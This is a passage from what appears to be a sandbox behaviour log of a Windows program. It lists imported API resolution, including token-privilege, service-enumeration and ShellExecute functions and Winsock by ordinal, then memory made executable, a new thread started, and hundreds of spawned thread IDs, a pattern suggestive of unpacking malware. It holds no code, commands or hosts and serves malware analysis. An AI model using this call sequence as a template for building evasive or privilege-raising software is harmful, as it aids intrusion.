lpProcName="FreeLibrary") returned 0x74044c40 [0123.920] GetProcAddress (hModule=0x74030000, lpProcName="WriteConsoleW") returned 0x7409f500 [0123.920] GetProcAddress (hModule=0x74030000, lpProcName="SetFilePointerEx") returned 0x7409f130 [0123.920] GetProcAddress (hModule=0x74030000, lpProcName="HeapReAlloc") returned 0x773cf630 [0123.920] GetProcAddress (hModule=0x74030000, lpProcName="HeapSize") returned 0x773ea790 [0123.920] GetProcAddress (hModule=0x74030000, lpProcName="GetConsoleMode") returned 0x7409f450 [0123.921] GetProcAddress (hModule=0x74030000, lpProcName="DecodePointer") returned 0x773f1ec0 [0123.921] GetProcAddress (hModule=0x74030000, lpProcName="GetConsoleCP") returned 0x7409f440 [0123.921] GetProcAddress (hModule=0x74030000, lpProcName="FlushFileBuffers") returned 0x7409ee70 [0123.921] GetProcAddress (hModule=0x74030000, lpProcName="SetStdHandle") returned 0x74046620 [0123.921] GetProcAddress (hModule=0x74030000, lpProcName="FreeEnvironmentStringsW") returned 0x74044c20 [0123.921] GetProcAddress (hModule=0x74030000, lpProcName="QueryPerformanceCounter") returned 0x74045da0 [0123.921] GetProcAddress (hModule=0x74030000, lpProcName="GetCurrentProcessId") returned 0x7409ea20 [0123.921] GetProcAddress (hModule=0x74030000, lpProcName="GetCurrentThreadId") returned 0x74048820 [0123.921] GetProcAddress (hModule=0x74030000, lpProcName="GetSystemTimeAsFileTime") returned 0x74045530 [0123.921] GetProcAddress (hModule=0x74030000, lpProcName="InitializeSListHead") returned 0x773f6680 [0123.922] GetProcAddress (hModule=0x74030000, lpProcName="IsDebuggerPresent") returned 0x74045930 [0123.922] GetProcAddress (hModule=0x74030000, lpProcName="UnhandledExceptionFilter") returned 0x740468d0 [0123.922] GetProcAddress (hModule=0x74030000, lpProcName="SetUnhandledExceptionFilter") returned 0x74046720 [0123.922] GetProcAddress (hModule=0x74030000, lpProcName="GetStartupInfoW") returned 0x74045320 [0123.922] GetProcAddress (hModule=0x74030000, lpProcName="IsProcessorFeaturePresent") returned 0x74045960 [0123.922] GetProcAddress (hModule=0x74030000, lpProcName="GetModuleHandleW") returned 0x740450d0 [0123.922] GetProcAddress (hModule=0x74030000, lpProcName="TerminateProcess") returned 0x740467e0 [0123.922] GetProcAddress (hModule=0x74030000, lpProcName="RaiseException") returned 0x74045e20 [0123.922] GetProcAddress (hModule=0x74030000, lpProcName="RtlUnwind") returned 0x74047c10 [0123.922] GetProcAddress (hModule=0x74030000, lpProcName="EnterCriticalSection") returned 0x773db2d0 [0123.923] GetProcAddress (hModule=0x74030000, lpProcName="LeaveCriticalSection") returned 0x773db250 [0123.923] GetProcAddress (hModule=0x74030000, lpProcName="DeleteCriticalSection") returned 0x773bfb90 [0123.923] GetProcAddress (hModule=0x74030000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x7409ebb0 [0123.923] GetProcAddress (hModule=0x74030000, lpProcName="TlsAlloc") returned 0x74046820 [0123.923] GetProcAddress (hModule=0x74030000, lpProcName="TlsGetValue") returned 0x74046850 [0123.923] GetProcAddress (hModule=0x74030000, lpProcName="TlsSetValue") returned 0x74046870 [0123.923] GetProcAddress (hModule=0x74030000, lpProcName="TlsFree") returned 0x74046830 [0123.923] GetProcAddress (hModule=0x74030000, lpProcName="LoadLibraryExW") returned 0x74045ac0 [0123.923] GetProcAddress (hModule=0x74030000, lpProcName="GetModuleHandleExW") returned 0x74045110 [0123.923] GetProcAddress (hModule=0x74030000, lpProcName="GetStdHandle") returned 0x74045330 [0123.924] GetProcAddress (hModule=0x74030000, lpProcName="WriteFile") returned 0x7409f180 [0123.924] GetProcAddress (hModule=0x74030000, lpProcName="MultiByteToWideChar") returned 0x74045c40 [0123.924] GetProcAddress (hModule=0x74030000, lpProcName="WideCharToMultiByte") returned 0x74046b10 [0123.924] GetProcAddress (hModule=0x74030000, lpProcName="GetACP") returned 0x74044ca0 [0123.924] GetProcAddress (hModule=0x74030000, lpProcName="GetStringTypeW") returned 0x740453b0 [0123.924] GetProcAddress (hModule=0x74030000, lpProcName="LCMapStringW") returned 0x74045a60 [0123.924] GetProcAddress (hModule=0x74030000, lpProcName="GetFileType") returned 0x7409ef60 [0123.924] GetProcAddress (hModule=0x74030000, lpProcName="FindClose") returned 0x7409ed70 [0123.924] GetProcAddress (hModule=0x74030000, lpProcName="FindFirstFileExW") returned 0x7409edd0 [0123.924] GetProcAddress (hModule=0x74030000, lpProcName="FindNextFileW") returned 0x7409ee40 [0123.925] GetProcAddress (hModule=0x74030000, lpProcName="IsValidCodePage") returned 0x740459c0 [0123.925] GetProcAddress (hModule=0x74030000, lpProcName="GetOEMCP") returned 0x74045160 [0123.925] GetProcAddress (hModule=0x74030000, lpProcName="GetCPInfo") returned 0x74044d10 [0123.925] GetProcAddress (hModule=0x74030000, lpProcName="GetCommandLineA") returned 0x74044cb0 [0123.925] GetProcAddress (hModule=0x74030000, lpProcName="GetEnvironmentStringsW") returned 0x74044eb0 [0123.925] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x745c0000 [0123.925] GetProcAddress (hModule=0x745c0000, lpProcName="OpenProcessToken") returned 0x745defb0 [0123.925] GetProcAddress (hModule=0x745c0000, lpProcName="OpenThreadToken") returned 0x745deeb0 [0123.925] GetProcAddress (hModule=0x745c0000, lpProcName="GetTokenInformation") returned 0x745dee90 [0123.926] GetProcAddress (hModule=0x745c0000, lpProcName="AdjustTokenPrivileges") returned 0x745dffa0 [0123.926] GetProcAddress (hModule=0x745c0000, lpProcName="LookupAccountSidW") returned 0x745df100 [0123.926] GetProcAddress (hModule=0x745c0000, lpProcName="OpenSCManagerW") returned 0x745e0540 [0123.926] GetProcAddress (hModule=0x745c0000, lpProcName="EnumServicesStatusW") returned 0x74604350 [0123.926] GetProcAddress (hModule=0x745c0000, lpProcName="LookupPrivilegeValueW") returned 0x745d8c80 [0123.926] GetProcAddress (hModule=0x745c0000, lpProcName="ImpersonateSelf") returned 0x745e0960 [0123.926] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x74a80000 [0123.926] GetProcAddress (hModule=0x74a80000, lpProcName="ShellExecuteW") returned 0x74be42e0 [0123.926] GetProcAddress (hModule=0x74a80000, lpProcName="CommandLineToArgvW") returned 0x74bdcc20 [0123.926] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x763b0000 [0124.156] GetProcAddress (hModule=0x763b0000, lpProcName=0x17) returned 0x763c4510 [0124.156] GetProcAddress (hModule=0x763b0000, lpProcName=0x15) returned 0x763bfd70 [0124.156] GetProcAddress (hModule=0x763b0000, lpProcName=0x14) returned 0x763b5a20 [0124.157] GetProcAddress (hModule=0x763b0000, lpProcName=0x73) returned 0x763b5b40 [0124.157] GetProcAddress (hModule=0x763b0000, lpProcName=0x8) returned 0x763b49d0 [0124.157] GetProcAddress (hModule=0x763b0000, lpProcName=0x3) returned 0x763c0910 [0124.157] GetProcAddress (hModule=0x763b0000, lpProcName=0x2) returned 0x763c1cc0 [0124.157] GetProcAddress (hModule=0x763b0000, lpProcName=0x74) returned 0x763c7170 [0124.157] GetProcAddress (hModule=0x763b0000, lpProcName=0xb) returned 0x763c9160 [0124.157] GetProcAddress (hModule=0x763b0000, lpProcName=0x9) returned 0x763c8ff0 [0124.158] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f2c8 | out: DllHandle=0x19f2c8*=0x74030000) returned 0x0 [0124.158] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0124.158] VirtualProtect (in: lpAddress=0x30001000, dwSize=0x16a77, flNewProtect=0x20, lpflOldProtect=0x19f364 | out: lpflOldProtect=0x19f364*=0x4) returned 1 [0124.159] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f2c8 | out: DllHandle=0x19f2c8*=0x74030000) returned 0x0 [0124.159] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0124.159] VirtualProtect (in: lpAddress=0x30018000, dwSize=0x7450, flNewProtect=0x2, lpflOldProtect=0x19f364 | out: lpflOldProtect=0x19f364*=0x4) returned 1 [0124.160] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f2c8 | out: DllHandle=0x19f2c8*=0x74030000) returned 0x0 [0124.160] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0124.160] VirtualProtect (in: lpAddress=0x30020000, dwSize=0x14f118, flNewProtect=0x4, lpflOldProtect=0x19f364 | out: lpflOldProtect=0x19f364*=0x4) returned 1 [0124.164] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f2c8 | out: DllHandle=0x19f2c8*=0x74030000) returned 0x0 [0124.164] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0124.165] VirtualProtect (in: lpAddress=0x30170000, dwSize=0xdc, flNewProtect=0x2, lpflOldProtect=0x19f364 | out: lpflOldProtect=0x19f364*=0x4) returned 1 [0124.165] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0124.165] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f2c0 | out: DllHandle=0x19f2c0*=0x74030000) returned 0x0 [0124.166] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0124.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x30007fc3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x280 [0124.172] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f4a0 | out: DllHandle=0x19f4a0*=0x74030000) returned 0x0 [0124.173] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0124.173] WaitForSingleObject (hHandle=0x280, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xbac Thread: id = 3 os_tid = 0x12f0 Thread: id = 4 os_tid = 0x7e8 Thread: id = 5 os_tid = 0x12e0 Thread: id = 6 os_tid = 0x12a4 Thread: id = 7 os_tid = 0xf0 Thread: id = 8 os_tid = 0x1300 Thread: id = 9 os_tid = 0x1340 Thread: id = 10 os_tid = 0x1310 Thread: id = 25 os_tid = 0x1314 Thread: id = 27 os_tid = 0x1268 Thread: id = 29 os_tid = 0x1254 Thread: id = 32 os_tid = 0xc14 Thread: id = 39 os_tid = 0x28c Thread: id = 48 os_tid = 0xf4c Thread: id = 53 os_tid = 0x498 Thread: id = 54 os_tid = 0x4a4 Thread: id = 55 os_tid = 0xc10 Thread: id = 56 os_tid = 0x8e0 Thread: id = 57 os_tid = 0x684 Thread: id = 58 os_tid = 0xb14 Thread: id = 59 os_tid = 0xad0 Thread: id = 60 os_tid = 0xe6c Thread: id = 61 os_tid = 0xf60 Thread: id = 62 os_tid = 0x1014 Thread: id = 63 os_tid = 0x1028 Thread: id = 65 os_tid = 0x1040 Thread: id = 66 os_tid = 0x13ec Thread: id = 72 os_tid = 0x107c Thread: id = 73 os_tid = 0x136c Thread: id = 74 os_tid = 0x137c Thread: id = 75 os_tid = 0x1388 Thread: id = 76 os_tid = 0x1370 Thread: id = 77 os_tid = 0x1380 Thread: id = 78 os_tid = 0x1090 Thread: id = 79 os_tid = 0x10a4 Thread: id = 80 os_tid = 0x10b8 Thread: id = 81 os_tid = 0x10cc Thread: id = 82 os_tid = 0x10e0 Thread: id = 83 os_tid = 0x1330 Thread: id = 84 os_tid = 0x132c Thread: id = 85 os_tid = 0x1328 Thread: id = 86 os_tid = 0x1360 Thread: id = 87 os_tid = 0x1374 Thread: id = 90 os_tid = 0x1120 Thread: id = 91 os_tid = 0x1134 Thread: id = 92 os_tid = 0x1148 Thread: id = 93 os_tid = 0x115c Thread: id = 94 os_tid = 0x1170 Thread: id = 95 os_tid = 0x1184 Thread: id = 96 os_tid = 0x11ac Thread: id = 97 os_tid = 0x11e8 Thread: id = 98 os_tid = 0x11fc Thread: id = 99 os_tid = 0x1210 Thread: id = 100 os_tid = 0x1224 Thread: id = 101 os_tid = 0x1238 Thread: id = 102 os_tid = 0x1260 Thread: id = 103 os_tid = 0x1274 Thread: id = 106 os_tid = 0xfdc Thread: id = 107 os_tid = 0xb4 Thread: id = 108 os_tid = 0x12f4 Thread: id = 109 os_tid = 0xea8 Thread: id = 110 os_tid = 0x89c Thread: id = 111 os_tid = 0x3cc Thread: id = 112 os_tid = 0x1084 Thread: id = 113 os_tid = 0x6b4 Thread: id = 114 os_tid = 0xfec Thread: id = 115 os_tid = 0xec8 Thread: id = 116 os_tid = 0x324 Thread: id = 117 os_tid = 0xd3c Thread: id = 118 os_tid = 0x58 Thread: id = 119 os_tid = 0x1164 Thread: id = 120 os_tid = 0x12fc Thread: id = 121 os_tid = 0x2ec Thread: id = 122 os_tid = 0x2d4 Thread: id = 123 os_tid = 0x3fc Thread: id = 124 os_tid = 0xfa0 Thread: id = 125 os_tid = 0x3a0 Thread: id = 126 os_tid = 0x1354 Thread: id = 128 os_tid = 0x5f4 Thread: id = 133 os_tid = 0x168 Thread: id = 134 os_tid = 0x158 Thread: id = 135 os_tid = 0x1150 Thread: id = 136 os_tid = 0x1344 Thread: id = 137 os_tid = 0xc2c Thread: id = 138 os_tid = 0xf00 Thread: id = 139 os_tid = 0xe08 Thread: id = 140 os_tid = 0xf2c Thread: id = 141 os_tid = 0x12c4 Thread: id = 142 os_tid = 0x5e0 Thread: id = 143 os_tid = 0x1098 Thread: id = 144 os_tid = 0x11b4 Thread: id = 145 os_tid = 0xf70 Thread: id = 146 os_tid = 0xdd4 Thread: id = 147 os_tid = 0xe88 Thread: id = 148 os_tid = 0xaf8 Thread: id = 149 os_tid = 0x1398 Thread: id = 150 os_tid = 0x105c Thread: id = 151 os_tid = 0x1394 Thread: id = 152 os_tid = 0x78c Thread: id = 153 os_tid = 0xe2c Thread: id = 154 os_tid = 0x1304 Thread: id = 155 os_tid = 0x1054 Thread: id = 156 os_tid = 0x10f4 Thread: id = 157 os_tid = 0x724 Thread: id = 158 os_tid = 0xb00 Thread: id = 159 os_tid = 0x13a8 Thread: id = 160 os_tid = 0x1048 Thread: id = 161 os_tid = 0x1198 Thread: id = 162 os_tid = 0x13a4 Thread: id = 163 os_tid = 0x11c0 Thread: id = 164 os_tid = 0x11d4 Thread: id = 165 os_tid = 0x124c Thread: id = 166 os_tid = 0x128c Thread: id = 179 os_tid = 0x13d0 Thread: id = 187 os_tid = 0x1110 Thread: id = 188 os_tid = 0x10a8 Thread: id = 189 os_tid = 0x10d0 Thread: id = 190 os_tid = 0x10fc Thread: id = 191 os_tid = 0x1124 Thread: id = 192 os_tid = 0x10bc Thread: id = 193 os_tid = 0x11b0 Thread: id = 194 os_tid = 0x11c4 Thread: id = 195 os_tid = 0xffc Thread: id = 196 os_tid = 0xf94 Thread: id = 197 os_tid = 0x7b4 Thread: id = 198 os_tid = 0xeb4 Thread: id = 199 os_tid = 0xf14 Thread: id = 200 os_tid = 0xde4 Thread: id = 201 os_tid = 0xddc Thread: id = 202 os_tid = 0x1214 Thread: id = 203 os_tid = 0x1228 Thread: id = 204 os_tid = 0x123c Thread: id = 205 os_tid = 0x119c Thread: id = 206 os_tid = 0x1264 Thread: id = 207 os_tid = 0x1094 Thread: id = 208 os_tid = 0xf50 Thread: id = 209 os_tid = 0x11c8 Thread: id = 210 os_tid = 0x1288 Thread: id = 211 os_tid = 0xbac Thread: id = 212 os_tid = 0xafc Thread: id = 213 os_tid = 0xee4 Thread: id = 214 os_tid = 0xf64 Thread: id = 217 os_tid = 0x4b0 Thread: id = 218 os_tid = 0xe70 Thread: id = 219 os_tid = 0xfc0 Thread: id = 220 os_tid = 0xf34 Thread: id = 221 os_tid = 0x1278 Thread: id = 222 os_tid = 0x12a0 Thread: id = 223 os_tid = 0x488 Thread: id = 224 os_tid = 0x1034 Thread: id = 225 os_tid = 0xdf4 Thread: id = 226 os_tid = 0x824 Thread: id = 227 os_tid = 0xff8 Thread: id = 228 os_tid = 0x1080 Thread: id = 229 os_tid = 0x13b0 Thread: id = 230 os_tid = 0xff0 Thread: id = 231 os_tid = 0x13cc Thread: id = 232 os_tid = 0xe30 Thread: id = 233 os_tid = 0x114c Thread: id = 234 os_tid = 0xef8 Thread: id = 235 os_tid = 0x450 Thread: id = 236 os_tid = 0xcbc Thread: id = 237 os_tid = 0xb74 Thread: id = 238 os_tid = 0x13c0 Thread: id = 239 os_tid = 0x11f0 Thread: id = 240 os_tid = 0xd88 Thread: id = 241 os_tid = 0x1174 Thread: id = 242 os_tid = 0x10f8 Thread: id = 243 os_tid = 0x131c Thread: id = 244 os_tid = 0x127c Thread: id = 245 os_tid = 0x13ac Thread: id = 246 os_tid = 0x13c8 Thread: id = 247 os_tid = 0x13bc Thread: id = 248 os_tid = 0x1308 Thread: id = 252 os_tid = 0xef4 Thread: id = 253 os_tid = 0x134c Thread: id = 254 os_tid = 0x12d4 Thread: id = 255 os_tid = 0x60 Thread: id = 256 os_tid = 0x5f8 Thread: id = 257 os_tid = 0x1070 Thread: id = 258 os_tid = 0x139c Thread: id = 259 os_tid = 0x13dc Thread: id = 260 os_tid = 0xd7c Thread: id = 261 os_tid = 0x1204 Thread: id = 262 os_tid = 0x106c Thread: id = 263 os_tid = 0x118c Thread: id = 264 os_tid = 0x20c Thread: id = 265 os_tid = 0x25c Thread: id = 266 os_tid = 0x26c Thread: id = 267 os_tid = 0x1fc Thread: id = 268 os_tid = 0xb18 Thread: id = 269 os_tid = 0x7b0 Thread: id = 270 os_tid = 0x5a4 Thread: id = 271 os_tid = 0xd08 Thread: id = 272 os_tid = 0xa84 Thread: id = 273 os_tid = 0x13d8 Thread: id = 274 os_tid = 0x1a4 Thread: id = 275 os_tid = 0xdec Thread: id = 276 os_tid = 0xc08 Thread: id = 277 os_tid = 0x8d4 Thread: id = 278 os_tid = 0x38c Thread: id = 283 os_tid = 0x28c Thread: id = 286 os_tid = 0x508 Thread: id = 287 os_tid = 0xfdc Thread: id = 288 os_tid = 0xe74 Thread: id = 289 os_tid = 0xfb0 Thread: id = 290 os_tid = 0x380 Thread: id = 291 os_tid = 0x5f4 Thread: id = 292 os_tid = 0xbc0 Thread: id = 293 os_tid = 0x1138 Thread: id = 294 os_tid = 0x714 Thread: id = 295 os_tid = 0xf10 Thread: id = 296 os_tid = 0x13c4 Thread: id = 297 os_tid = 0xad4 Thread: id = 298 os_tid = 0x135c Thread: id = 299 os_tid = 0x1318 Thread: id = 300 os_tid = 0x1404 Thread: id = 301 os_tid = 0x1408 Thread: id = 302 os_tid = 0x140c Thread: id = 305 os_tid = 0x1418 Thread: id = 306 os_tid = 0x141c Thread: id = 307 os_tid = 0x1420 Thread: id = 308 os_tid = 0x1424 Thread: id = 309 os_tid = 0x1428 Thread: id = 310 os_tid = 0x142c Thread: id = 311 os_tid = 0x1430 Thread: id = 312 os_tid = 0x1434 Thread: id = 313 os_tid = 0x1438 Thread: id = 314 os_tid = 0x143c Thread: id = 315 os_tid = 0x1440 Thread: id = 316 os_tid = 0x1444 Thread: id = 317 os_tid = 0x1448 Thread: id = 318 os_tid = 0x144c Thread: id = 319 os_tid = 0x1450 Thread: id = 320 os_tid = 0x1454 Thread: id = 321 os_tid = 0x1458 Thread: id = 322 os_tid = 0x145c Thread: id = 323 os_tid = 0x1460 Thread: id = 324 os_tid = 0x1464 Thread: id = 325 os_tid = 0x1468 Thread: id = 326 os_tid = 0x146c Thread: id = 327 os_tid = 0x1470 Thread: id = 328 os_tid = 0x1474 Thread: id = 329 os_tid = 0x1478 Thread: id = 330 os_tid = 0x147c Thread: id = 331 os_tid = 0x1480 Thread: id = 332 os_tid = 0x1484 Thread: id = 333 os_tid = 0x1488 Thread: id = 334 os_tid = 0x148c Thread: id = 335 os_tid = 0x1490 Thread: id = 336 os_tid = 0x1494 Thread: id = 337 os_tid = 0x1498 Thread: id = 338 os_tid = 0x149c Thread: id = 339 os_tid = 0x14a0 Thread: id = 340 os_tid = 0x14a4 Thread: id = 341 os_tid = 0x14a8 Thread: id = 342 os_tid = 0x14ac Thread: id = 343 os_tid = 0x14b0 Thread: id = 344 os_tid = 0x14b4 Thread: id = 345 os_tid = 0x14b8 Thread: id = 346 os_tid = 0x14bc Thread: id = 347 os_tid = 0x14c0 Thread: id = 348 os_tid = 0x14c4 Thread: id = 349 os_tid = 0x14c8 Thread: id = 350 os_tid = 0x14cc Thread: id = 351 os_tid = 0x14d0 Thread: id = 355 os_tid = 0x14e0 Thread: id = 356 os_tid = 0x14e4 Thread: id = 357 os_tid = 0x14e8 Thread: id = 358 os_tid = 0x14ec Thread: id = 359 os_tid = 0x14f0 Thread: id = 360 os_tid = 0x14f4 Thread: id = 361 os_tid = 0x14f8 Thread: id = 362 os_tid = 0x14fc Thread: id = 363 os_tid = 0x1500 Thread: id = 364 os_tid = 0x1504 Thread: id = 365 os_tid = 0x1508 Thread: id = 366 os_tid = 0x150c Thread: id = 367 os_tid = 0x1510 Thread: id = 368 os_tid = 0x1514 Thread: id = 369 os_tid = 0x1518 Thread: id = 370 os_tid = 0x151c Thread: id = 371 os_tid = 0x1520 Thread: id = 372 os_tid = 0x1524 Thread: id = 373 os_tid = 0x1528 Thread: id = 374 os_tid = 0x152c Thread: id = 375 os_tid = 0x1530 Thread: id = 376 os_tid = 0x1534 Thread: id = 377 os_tid = 0x1538 Thread: id = 378 os_tid = 0x153c Thread: id = 379 os_tid = 0x1540 Thread: id = 381 os_tid = 0x1548 Thread: id = 382 os_tid = 0x154c Thread: id = 383 os_tid = 0x1550 Thread: id = 384 os_tid = 0x1554 Thread: id = 385 os_tid = 0x1558 Thread: id = 386 os_tid = 0x155c Thread: id = 387 os_tid = 0x1560 Thread: id = 388 os_tid = 0x1568 Thread: id = 389 os_tid = 0x156c Thread: id = 390 os_tid = 0x1570 Thread: id = 391 os_tid = 0x1574 Thread: id = 392 os_tid = 0x1578 Thread: id = 393 os_tid = 0x157c Thread: id = 394 os_tid = 0x1580 Thread: id = 395 os_tid = 0x1584 Thread: id = 396 os_tid = 0x1588 Thread: id = 397 os_tid = 0x158c Thread: id = 398 os_tid = 0x1590 Thread: id = 399 os_tid = 0x1594 Thread: id = 400 os_tid = 0x1598 Thread: id = 401 os_tid = 0x159c Thread: id = 402 os_tid = 0x15a0 Thread: id = 403 os_tid = 0x15a4 Thread: id = 404 os_tid = 0x15a8 Thread: id = 405 os_tid = 0x15ac Thread: id = 406 os_tid = 0x15b0 Thread: id = 407 os_tid = 0x15b4 Thread: id = 408 os_tid = 0x15b8 Thread: id = 409 os_tid = 0x15bc Thread: id = 410 os_tid = 0x15c0 Thread: id = 411 os_tid = 0x15c4 Thread: id = 412 os_tid = 0x15c8 Thread: id = 413 os_tid = 0x15cc Thread: id = 414 os_tid = 0x15d0 Thread: id = 415 os_tid = 0x15d4 Thread: id = 416 os_tid = 0x15d8 Thread: id = 417 os_tid = 0x15dc Thread: id = 418 os_tid = 0x15e0 Thread: id = 419 os_tid = 0x15e4 Thread: id = 420 os_tid = 0x15e8 Thread: id = 421 os_tid = 0x15ec Thread: id = 422 os_tid = 0x15f0 Thread: id = 423 os_tid = 0x15f4 Thread: id = 424 os_tid = 0x15f8 Thread: id = 425 os_tid = 0x15fc Thread: id = 426 os_tid = 0x1600 Thread: id = 427 os_tid = 0x1604 Thread: id = 428 os_tid = 0x1608 Thread: id = 429 os_tid = 0x160c Thread: id = 430 os_tid = 0x1610 Thread: id = 431 os_tid = 0x1618 Thread: id = 432 os_tid = 0x161c Thread: id = 433 os_tid = 0x1620 Thread: id = 434 os_tid = 0x1624 Thread: id = 435 os_tid = 0x1628 Thread: id = 436 os_tid = 0x162c Thread: id = 437 os_tid = 0x1630 Thread: id = 438 os_tid = 0x1634 Thread: id = 439 os_tid = 0x1638 Thread: id = 440 os_tid = 0x163c Thread: id = 441 os_tid = 0x1640 Thread: id = 442 os_tid = 0x1644 Thread: id = 443 os_tid = 0x1648 Thread: id = 444 os_tid = 0x164c Thread: id = 447 os_tid = 0x1658 Thread: id = 448 os_tid = 0x165c Thread: id = 449 os_tid = 0x1660 Thread: id = 450 os_tid = 0x1664 Thread: id = 451 os_tid = 0x1668 Thread: id = 452 os_tid = 0x166c Thread: id = 453 os_tid = 0x1670 Thread: id = 454 os_tid = 0x1674 Thread: id = 455 os_tid = 0x1678 Thread: id = 456 os_tid = 0x167c Thread: id = 457 os_tid = 0x1680 Thread: id = 458 os_tid = 0x1684 Thread: id = 459 os_tid = 0x1688 Thread: id = 460 os_tid = 0x168c Thread: id = 461 os_tid = 0x1690 Thread: id = 462 os_tid = 0x1694 Thread: id = 463 os_tid = 0x1698 Thread: id = 464 os_tid = 0x169c Thread: id = 465 os_tid = 0x16a0 Thread: id = 466 os_tid = 0x16a4 Thread: id = 467 os_tid = 0x16a8 Thread: id = 468 os_tid = 0x16ac Thread: id = 469 os_tid = 0x16b0 Thread: id = 470 os_tid = 0x16b4 Thread: id = 471 os_tid = 0x16b8 Thread: id = 472 os_tid = 0x16bc Thread: id = 473 os_tid = 0x16c0 Thread: id = 474 os_tid = 0x16c4 Thread: id = 475 os_tid = 0x16c8 Thread: id = 476 os_tid = 0x16cc Thread: id = 477 os_tid = 0x16d0 Thread: id = 478 os_tid = 0x16d4 Thread: id = 479 os_tid = 0x16d8 Thread: id = 480 os_tid = 0x16dc Thread: id = 481 os_tid = 0x16e0 Thread: id = 482 os_tid = 0x16e4 Thread: id = 483 os_tid = 0x16e8 Thread: id = 484 os_tid = 0x16ec Thread: id = 485 os_tid = 0x16f0 Thread: id = 486 os_tid = 0x16f4 Thread: id = 487 os_tid = 0x16f8 Thread: id = 488 os_tid = 0x16fc Thread: id = 489 os_tid = 0x1700 Thread: id = 490 os_tid = 0x1704 Thread: id = 491 os_tid = 0x1708 Thread: id = 492 os_tid = 0x170c Thread: id = 493 os_tid = 0x1710 Thread: id = 494 os_tid = 0x1714 Thread: id = 495 os_tid = 0x1718 Thread: id = 496 os_tid = 0x171c Thread: id = 497 os_tid = 0x1720 Thread: id = 498 os_tid = 0x1724 Thread: id = 499 os_tid = 0x1728 Thread: id = 500 os_tid = 0x172c Thread: id = 501 os_tid = 0x1730 Thread: id = 502 os_tid = 0x1734 Thread: id = 503 os_tid = 0x1738 Thread: id = 504 os_tid = 0x173c Thread: id = 505 os_tid = 0x1740 Thread: id = 506 os_tid = 0x1744 Thread: id = 507 os_tid = 0x1748 Thread: id = 508 os_tid = 0x174c Thread: id = 509 os_tid = 0x1750 Thread: id = 510 os_tid = 0x1754 Thread: id = 513 os_tid = 0x1764 Thread: id = 514 os_tid = 0x1768 Thread: id = 515 os_tid = 0x176c Thread: id = 516 os_tid = 0x1770 Thread: id = 517 os_tid = 0x1774 Thread: id = 518 os_tid = 0x1778 Thread: id = 519 os_tid = 0x177c Thread: id = 520 os_tid = 0x1780 Thread: id = 521 os_tid = 0x1784 Thread: id = 522 os_tid = 0x1788 Thread: id = 523 os_tid = 0x178c Thread: id = 524 os_tid = 0x1790 Thread: id = 525 os_tid = 0x1794 Thread: id = 526 os_tid = 0x1798 Thread: id = 527 os_tid = 0x179c Thread: id = 528 os_tid = 0x17a0 Thread: id = 529 os_tid = 0x17a4 Thread: id = 530 os_tid = 0x17a8 Thread: id = 531 os_tid = 0x17ac Thread: id = 532 os_tid = 0x17b0 Thread: id = 533 os_tid = 0x17b4 Thread: id = 534 os_tid = 0x17b8 Thread: id = 535 os_tid = 0x17bc Thread: id = 536 os_tid = 0x17c0 Thread: id = 537 os_tid = 0x17c4 Thread: id = 538 os_tid = 0x17c8 Thread: id = 539 os_tid = 0x17cc Thread: id = 540 os_tid = 0x17d0 Thread: id = 541 os_tid = 0x17d4 Thread: id = 542 os_tid = 0x17d8 Thread: id = 543 os_tid = 0x17dc Thread: id = 544 os_tid = 0x17e0 Thread: id = 545 os_tid = 0x17e4 Thread: id = 546 os_tid = 0x17e8 Thread: id = 547 os_tid = 0x17ec Thread: id = 548 os_tid = 0x17f0 Thread: id = 549 os_tid = 0x17f4 Thread: id = 550 os_tid = 0x17f8 Thread: id = 551 os_tid = 0x17fc Thread: id = 552 os_tid = 0x13d0 Thread: id = 553 os_tid = 0xf4 Thread: id = 554 os_tid = 0x1564 Thread: id = 555 os_tid = 0x734 Thread: id = 556 os_tid = 0x12b4 Thread: id = 557 os_tid = 0x1804 Thread: id = 558 os_tid = 0x1808 Thread: id = 562 os_tid = 0x180c Thread: id = 567 os_tid = 0x183c Thread: id = 568 os_tid = 0x1840 Thread: id = 569 os_tid = 0x1844 Thread: id = 570 os_tid = 0x1848 Thread: id = 571 os_tid = 0x184c Thread: id = 572 os_tid = 0x1850 Thread: id = 573 os_tid = 0x1854 Thread: id = 574 os_tid = 0x1858 Thread: id = 575 os_tid = 0x185c Thread: id = 576 os_tid = 0x1860 Thread: id = 577 os_tid = 0x1864 Thread: id = 578 os_tid = 0x1868 Thread: id = 579 os_tid = 0x186c Thread: id = 580 os_tid = 0x1870 Thread: id = 581 os_tid = 0x1874 Thread: id = 582 os_tid = 0x1878 Thread: id = 583 os_tid = 0x187c Thread: id = 584 os_tid = 0x1880 Thread: id = 585 os_tid = 0x1884 Thread: id = 586 os_tid = 0x1888 Thread: id = 587 os_tid = 0x188c Thread: id = 588 os_tid = 0x1890 Thread: id = 589 os_tid = 0x1894 Thread: id = 591 os_tid = 0x1898 Thread: id = 592 os_tid = 0x18a0 Thread: id = 593 os_tid = 0x18a4 Thread: id = 594 os_tid = 0x18a8 Thread: id = 595 os_tid = 0x18ac 